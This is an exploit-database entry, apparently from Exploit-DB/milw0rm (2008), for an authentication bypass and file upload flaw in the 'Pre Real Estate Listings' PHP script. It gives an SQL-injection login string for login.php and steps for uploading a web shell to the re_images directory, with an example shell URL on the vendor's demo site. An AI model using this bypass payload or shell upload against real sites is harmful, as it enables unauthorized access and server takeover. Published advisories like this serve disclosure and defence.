header-logo
Suggest Exploit
vendor:
Pre Real Estate Listings
by:
BackDoor
7.5
CVSS
HIGH
ByPass /File Upload
287
CWE
Product Name: Pre Real Estate Listings
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pre Real Estate Listings (login.php) ByPass /File Upload

A vulnerability in the Pre Real Estate Listings script allows an attacker to bypass authentication and upload malicious files. By sending a specially crafted HTTP request to the login.php page, an attacker can bypass authentication and gain access to the application. Additionally, an attacker can upload malicious files to the re_images directory, which is not protected by the application. This allows an attacker to upload malicious files, such as web shells, and gain access to the application.

Mitigation:

Ensure that authentication is properly implemented and that all directories are properly protected.
Source

Exploit-DB raw data:

Pre Real Estate Listings (login.php) ByPass /File Upload
Script:Pre Real Estate Listings
HomePage:http://preproject.com/
Demo:http://preproject.com/ulisting/
Author:BackDoor
By Pass Exploit:
http://victim.com/scriptpath/login.php username:'or' password:'or'
Live Demo:
http://preproject.com/ulisting/login.php
File Upload Exploit:
login live demo username:'or' password:'or'
Edit Your Profile Link:http://preproject.com/ulisting/profile.php
Upload Your Shell:
Example:
http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
 
Cyber-Security TIM //Lojistik

# milw0rm.com [2008-11-11]